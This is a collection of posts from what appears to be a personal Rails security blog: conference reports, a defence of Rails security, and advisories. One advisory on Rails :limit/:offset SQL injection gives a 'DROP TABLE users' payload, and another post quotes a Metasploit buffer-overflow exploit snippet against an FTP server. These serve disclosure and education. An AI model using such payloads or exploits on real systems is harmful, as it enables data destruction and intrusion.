BlogFish

The last past days in Amsterdam for Ruby En Rails 2009 were really great.

I arrived on Thursday and had the chance to discuss a possible security vulnerability in Rails I discovered a while back with Yehuda and Mislav during lunch.

Afterwards we went to the conference dinner and met many very nice people and had a long discussion about voting systems, European vs. American culture, gun laws, and political systems.

Friday was the first conference day and started for us with being 40 minutes late as we headed up to the wrong metro station. Yehuda was supposed to give a keynote as the first session... luckily the organizers swapped the sessions. So unfortunately we missed the first session but were in time for Yehuda to give his keynote.

Yehuda talked about the Rails/Merb merge and dissected what was achieved. It was a very good, in-depth presentation about the new features of Rails 3 and what left to do. I really liked the new router DSL, actions being Rack-apps, and the death of Rails Metal (the new, slicker possibility to build simpler/smaller controllers takes care of this.).

After the coffee break I gave my Rails Security presentation about common attacks against web applications and how you can protect against them in Rails. Usually this is quite heavy stuff and people tend to sit quiet and listen as this is new to most. In Amsterdam I had some very good questions and discussions on session fixation, JavaScript high-jacking, and app reconnaissance.

Then we listened to Julio Javier Cicchelli talk about Rubyists.EU, an effort to make the different European Rails communities easier to find and build a common European community.

We went to lunch with James which gave us some time to catch up. Took us a while to find a decent place around the conference hall but we managed to find a restaurant where we tried to estimate the global financial burden due to Internet Explorer and what will happen to Microsoft if they were charged for the extra work needed done.

After lunch Eloy educated us about the current state of MacRuby. I'm really looking forward to spending some time hacking Mac apps in Ruby.

The next session gave an overview about monitoring, performance, and the different tools like request-log-analyzer or Nagios.

The conference was closed by Jeremy giving a keynote about Rails, Ruby, and the current state of things in the community (and a sneak-peak at ActiveRelation and what it will be able to do). It was very well received and a good closing session.

Afterwards a big group headed for dinner. We ended up in a small, very local restaurant. It included very nice food, good discussions with new friends from Finnland, and a waiter/owner who runs the restaurant homepage with Rails and asked Yehuda for help :-)

The next day was titled Geek Day and included many lightning talks (that ended up being nearly full sessions and had very good content). Parallel to the great sessions about MongoDB, DataMapper, or experience reports there was a Rails Rumble featuring five teams going on.

The most notable session of the second day was Justin Halsall, dressed for Halloween, talking about BlockHelpers and view DSLs. It was a hilarious show.

The Rumble was a great idea. In contrast to the usual Rumble the teams got a specific challenge. They should build something that improves the situation with Rails dependencies and out-of-date gems laying around in vendor/gems. The winning team would get two tickets to RailsConf 2010.

One team extended builder to list outdated gems and got their changes even merged back to builder by Yehuda on the same day. Another team extended Webistrano to accept projects dependencies and display them on the stage page. Some teams build a command line tool to extract local dependencies like your gems or even the MySQL version and push those definitions to a central place. The winning team had the the most advanced idea regarding update notification and gem-sets for applications. I could really see something like this being integrated into gemcutter. Congratulations Ludo and Michel!

Ruby En Rails day two was celebrated with a big dinner and drinks. After a very nice evening we headed back to the hotel as everybody had an early flight out. Some were still discussing Rails, some were lucky to be able to enjoy Amsterdam longer.

I really enjoyed the conference and Amsterdam. Thank you Chris and Tim Obdam for organizing the whole event!

Recently I've been made aware of people inside US Government organizations using my Ruby on Rails Security presentation as an excuse to limit Ruby on Rails adoption and projects inside those organizations.

They mandate that applications in Rails should be redone in Java because of the issues I covered.

It is not clear to me how anybody who saw/read this presentation would come to the conclusion that Rails is insecure. Every application is vulnerable. Some more and some less. Yes, this means that also Java applications are attackable.

It is my honest and strong belief that Ruby on Rails applications are not less secure than any other web application. In contrast, the Ruby on Rails framework provides several advanced security mechanisms that make it very easy to write secure applications. Further, Ruby on Rails enables very sane security options by default. Some of those defaults include auto-escaping, prevent Cross-Site Request Forgery, or protected from SQL-injection. I would even go as far as to state that the typical Rails application is more secure than the typical web application for those reasons.

The security of an application stands and falls with the knowledge and abilities of the people implementing and running it. Rails makes it very easy to write secure applications.

The conclusion I came to in my presentation still holds:

Ruby is by no means a "web app security silver bullet" but adding security is easy and not a pain like in many other frameworks

I hope this will change the opinion of some people and remove my presentation as their argument.

Day two of RailsConf Europe 2008 is over and so are my two sessions.

On tutorial day Mathias and I did a 4h workshop on deploying and monitoring Rails applications. The tutorial went really well, apart from the AirportExpress base station not coping with 100 laptops connecting to it. In the practical part we had a FreeBSD server with 40 virtual machines running and helped the audience deploy an example application with git or svn and Mongrel or mod_rails.

On day two I held my Security on Rails session where I go over the various attacks and countermeasures against Rails applications. This session was also well received and I hope I could educate people a bit about WebAppSecurity.

The slides are available as PDF here: Security on Rails (PDF) Deploying and Monitoring Rails (PDF)

Further, you can find both presentations at slideshare.

The slides are available as PDF here: Security on Rails (PDF) Deploying and Monitoring Rails (PDF)

If you attended one of my sessions, I encourage you to rate them at the conference site.

So far my expectations have been met and I've could catch up with a lot of people. I'm looking forward to day three of RailsConf Europe!

If you are following my twitter stream you have probably read me rambling about a security hole in Rails < 2.1.

With Rails 2.1 out for a while I though I should describe the problem a bit as there are many Rails applications stuck in 1.2.3 or 2.0.

The story begins with me giving a talk about Ruby on Rails security at Dynamic Languages World Europe in Karlsruhe. While talking about SQL injection, Tobias Schlottke, a fellow German Rails developer, mentioned that he once saw ActiveRecord allowing random SQL in the :offset option. Everybody in the room agreed that shouldn't be possible or wanted.

Later that day I sat down with Steven Bristol and we tried to verify this. Playing with MySQL we only got ActiveRecord::StatementInvalid exceptions. So I installed PostgreSQL (damn you MacPorts!) and tried the same with PostgreSQL and SQLite. Both times I got straight SQL Injection. Looking through the code I found out that the :offset parameter was also prone to SQL injection:

# vulnerable controller code
User.find(:all, :limit => params[:limit])

User.find(:all, :limit => 10, :offset => params[:offset])

# with params[:offset] or params[:limit] set to '; DROP TABLE users;'
# you got a big problem ...

MySQL is also affected but thanks to its default setting of disallowing multiple SQL statements per API-call you cannot insert a new SQL clause. You can just manipulate the one executing by setting other parameters (like an offset).

I've seen a lot of code taking the :offset parameter straight from the HTTP params and all people I talked with thought of it being a big problem. Especially since the documentation speaks about :offset and :limit being two integers (so you, or at least I, would expect auto-quoting like done for User.find(params[:id])).

I wrote a patch that casts both :limit and :offset to integers and sent it to core@ hoping for it to be included before Rails 2.1. After a bit of discussion if this is a bug or a feature (as apparently :limit can also be '1, 5'), Steven got hold of DHH at RailsConf and of Aaron Bedra who apparently discovered this problem a couple of months ago. Steven wrote a new patch with Aaron that also checks for the '1, 5' syntax of :limit and David committed it for Rails 2.1.

Unfortunately the committed patch didn't include fixing the MySQL adapter as it overrides the method that adds the limit and offset options. This isn't as bad as it sounds as MySQL will not allow multiple SQL statements by default. David later committed a patch of mine fixing MySQL in edge (and the coming 2.1.1).

So if the new features alone will not bring you to Rails 2.1, here you have another reason to upgrade.

For you guys stuck in 1.2 or 2.0 land, either always cast your :limit and :offset options, or use those patches:

Rails 1.2.3 patch

Rails 2.0.2 patch

P.S: You guys using will_paginate are save as it casts the parameters by default.

May is going to be a busy month, with several conferences and events lined up.

On May 14 I will be giving a lecture on Web 2.0 technologies for the Web 2.0 Start-Ups - Vom Entrepreneur zum Business Angel seminar at the Technical University of Berlin. This seminar, organized by Timo Glaser, is packed with German Entrepreneurs, Venture Capitalists, and founders. My lecture will cover why start-ups nowadays are able to deliver great services and products so fast. Amazons Web Services, Google App Engine, Ajax, Ruby on Rails, and Open Source tools will be part of the story.

	On May 27 -28 I will be at the Dynamic Languages World Europe conference in Karlsruhe. With speakers like Neal Ford, Jason Seifer, Stefan Tilkov or Gregg Pollack there is some interesting line-up. I will be talking about Ruby on Rails Security, from deployment security to CSRF or XSS in Rails.
	May ends for me with Linuxtag 2008 here in Berlin (May 28 - 31). There I will also talk about Ruby on Rails Security. Further, it seems like a very interesting project I'am part of will present a sneak peak.

The slides and a video of my Ruby on Rails Security session are now online. The 24C3 was a lot of fun, unfortunately I couldn't spend all 4 days there.

My talk covered most of the common web application vulnerabilities like Cross Site Scripting and Cross Site Request Forgery, SQL and Code injection, and deployment security and how they apply to Rails. Further Ruby on Rails specific issues like Rails plugin security, JavaScript/Ajax security, and Rails configuration were be examined and best practice solutions were introduced.

| View | Upload your own

The is also a Google video version: Ruby on Rails Security.

Get the slides (PDF - 1.6 MB) or the video (mkv - 95 MB). Other formats are available from the official mirrors or the torrent site.

Yes, there is now a second remote hole in OpenBSD. In the last 10 years there was only one, yesterday Theo de Raadt posted the second one (discovered by Core Security Technologies) to misc@openbsd.org. The vulnerability involves a mbuf remote kernel buffer overflow in the IPv6 code.

So you should patch immediately if you use IPv6 or disable it through PF (as it is enabled by default):

block in inet6 

Apart from that the upcoming 4.1 release (“Puffy Baba & the 40 Vendors”) release is available for pre-order.

The conference details and sessions (“Fahrplan”) for the 23C3 – the 23rd Chaos Communication Congress – were posted on the ccc events blog. As usual a lot of talks around hacking, security, and computers in todays culture. Interesting sessions around the Web include JSON RPC – Cross Site Scripting and Client Side Web Services or Privacy, Identity, and Anonymity in Web 2.0.

If you are a fellow Ruby enthusiast and plan to come, drop me an email, maybe we can organize a meet-up for Ruby/Rails folks.

So see you from the 27th to the 30th December in Berlin, Germany!

There seems to be a Denial of Service vulnerability in Ruby’s CGI.rb that affects all Ruby applications that use CGI for Mime parsing. That will include all Rails applications that are running on Mongrel or CGI. The only not affected constellations are WEBrick and FastCGI. A malicious URL will cause CGI.rb to use max. CPU in an infinitive loop.

So if your are using Mongrel, hotfix your installation b using the latest pre-release that depends on the monkey-patch to CGI.rb:

sudo gem install mongrel --source=http://mongrel.rubyforge.org/releases

If you are using CGI.rb by other means, install the hotfix-gem and require it:

gem install cgi_multipart_eof_fix --source=http://mongrel.rubyforge.org/releases

More details by Zed Shaw here.

Richard Bejtlich wrote a good comment/wrap-up on the recent Windows WMF vulnerability and the unofficial patch from Ilfak Guilfanov hostet by SANS.

Richard summarizes:

The unofficial patch Tom references was written by Ilfak Guilfanov and described here. What is this? It’s a patch created by a non-Microsoft developer, acting more rapidly than Microsoft itself. Sure, you can argue that Microsoft is working now to develop a patch that will hopefully address deeper problems, perhaps serious problems. Nevertheless, SANS has reverse engineered the unoffical patch to ensure its validity, wrote a FAQ about the vulnerability, and is now hosting a .msi to ease patch installation. This is unprecedented.

Where is Microsoft on this issue? They published their initial advisory on 28 Dec and updated it 30 Dec. Nothing they’ve done has helped resolve the issue. Meanwhile, the Metasploit project has released a module to generate malicious WMF files. This puts exploit creation in the hands of the lowest common denomintaor.

Make sure to read his whole post.

Metasploit, the nice exploit framework, released an alpha for the new 3.0 version. Apart from new features and exploits, the language was switched from Perl to Ruby:

Unlike the 2.0 series, the 3.0 branch is written in Ruby, an object-oriented, interpreted scripting language, that has drastically simplified the implementation of the framework.

...

To demonstrate how the 3.0 branch has simplified exploit development, check out the following code sample, which provides the exploit body for the 3Com 3CDaemon 2.0 FTP Username Overflow (3cdaemon_ftp_user.rb):

-
connect
print_status(“Trying target #{target.name}...”)
buf = Rex::Text.rand_text_english(2048, payload_badchars)
seh = generate_seh_payload(target.ret)
buf[229, seh.length] = seh
send_cmd( [‘USER’, buf] , false )
disconnect
handler
-

Nice and clean, especially if compared to the older Perl exploit wrappers.

Another nice feature is the integration of IRB as known in Rails from script/console that allows direct interactation with the framework instance.

A hint for OS X users: Apple’s included version of pack/unpack is of course broken so you need to use another version. I run the framework with fink’s version of Ruby:

# /sw/bin/ruby msfconsole

See the release notes for more information.

The 22nd Chaos Communication Congress (22C3) is a four-day conference on technology, society and utopia. The Congress offers lectures and workshops on a multitude of topics including (but not limited to) information technology, IT-security, internet, cryptography and generally a critical-creative attitude towards technology and the discussion about the effects of technological advances on society.

So the 22nd CCC is not far away and I wanted to help to spread the word. I’ll certainly be there as the congress will be held in my hometown Berlin, Germany. I was thinking about presenting something about Rails and in particular about security issues and default settings in Rails but when I finally decided to do so it was to late.

There is now an official 22C3 blog, a public wiki and the artwork is also finished.

See you in december!

UPDATE:
The schedule was released.

You could mean that 1und1, one of the big players in the german hosting market, is able to configure its webservers…

From the announcement:

The Metasploit Framework is an advanced open-source exploit development platform. The 2.5 release includes three user interfaces, 105 exploits and 75 payloads.

A demo can be found here.

With Metasploit you can combine different exploits with different payloads to a attack. You can use the included exploits and payloads or use your own with a little help of Perl. Therefore the Metasploit Framework make it really easy to use public exploits and attack vulnerable systems. I do not know if this is a good thing…

Airscanner released a security advisory about a iTunes 6.0 shared music Denial of Service/Spoofing/Flooding/Abuse vulnerability.

From the advisory:

Risk Level:
Low: Denial of service (Shared Music anonymous forced disconnect) and list abuse attacks are both merely annoying to iTunes users.
Medium: Shared Music lists from various users can be renamed and swapped, thus creating an environment in which you can’t be sure to whom you are connecting.


Summary:
iTunes is a popular service allowing you to play music, buy music, download music, share music, create playlists, etc.; it includes a video player and other features: http://www.itunes.com
The iTunes Shared Music feature allows users on a network to create playlists from songs on their computer and to share them on the network. When you create a new list and enable sharing, other iTunes users will see your lists under the Shared Music list, unless they change their preferences from the default settings. We discovered that it is possible to create spoofed Shared Music entries, to rename existing entries, to disconnect existing entries, and to re-initiate existing lists. We can also kill an existing stream without authorization via an anonymous packet.

Workaround:
Disable ‘Look for shared music’ option under the Sharing tab in Preferences.

There is also a Flash demo here.

With Apple becoming more and more popular, security researchers are more interested in OS X applications.